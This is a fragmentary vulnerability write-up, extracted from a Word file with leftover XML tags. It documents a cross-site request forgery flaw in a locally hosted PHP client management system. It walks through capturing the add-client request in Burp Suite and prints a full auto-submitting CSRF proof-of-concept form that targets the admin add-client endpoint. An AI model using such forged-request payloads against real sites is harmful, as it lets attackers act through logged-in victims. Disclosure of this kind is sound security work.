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VULNERABILITY : CSRF LEADS TO ADDING FAKE CLIENT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STEP:-1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 up the Environment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Locally host a website named Client Management System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Using MySQL and PHP.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website includes functionality for adding the clients and their services.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STEP:-2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Login as Admin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By using the given username and password into the Client Management System.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Poc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STEP:3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the new Client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the add client option and enter the required client details.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Poc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Poc 3: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STEP:4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Capture the Client adding Request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Save button on the website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clicking the Save button, Set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to intercept the request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Save button and capture the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request, before it hit the server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the captured request to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater tab in Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the analysis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PoC 4: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STEP:5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the captured adding client  request to generate a CSRF Proof-of-Concept</w:t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(PoC):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&lt;html&gt;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&lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;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&lt;body&gt;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&lt;form action="http://localhost/clientms/admin/add-client.php" method="POST"&gt;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name="accounttype" value="Active&amp;#32;Account" /&gt;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name="cname" value="moulimurugan" /&gt;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name="comname" value="kppr" /&gt;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name="address" value="vijayamangalam" /&gt;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name="city" value="erode" /&gt;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name="state" value="tamil" /&gt;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name="zcode" value="638026" /&gt;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name="wphnumber" value="968560710" /&gt;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name="cellphnumber" value="6931052465" /&gt;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name="ophnumber" value="9638560410" /&gt;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name="email" value="moulimurugan&amp;#64;gmail&amp;#46;com" /&gt;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name="password" value="moulimurugan" /&gt;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name="websiteadd" value="clientmsdb" /&gt;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name="notes" value="Nil" /&gt;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type="hidden" name="submit" value="" /&gt;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&lt;input type="submit" value="Submit request" /&gt;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&lt;/form&gt;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&lt;script&gt;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history.pushState('', '', '/');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document.forms[0].submit();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&lt;/script&gt;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&lt;/body&gt;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Copy the link to the Poc file and prepare it for testing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PoC 5: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:6</w:t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the CRRF PoC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existing details of client1 to client2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link generated in above PoC5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webpage open with the submit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hit the submit button the new client is added to the dashboard in the PoC 9 and PoC 8.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PoC 6 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PoC 7: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6612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PoC 8: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PoC 9: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8.jp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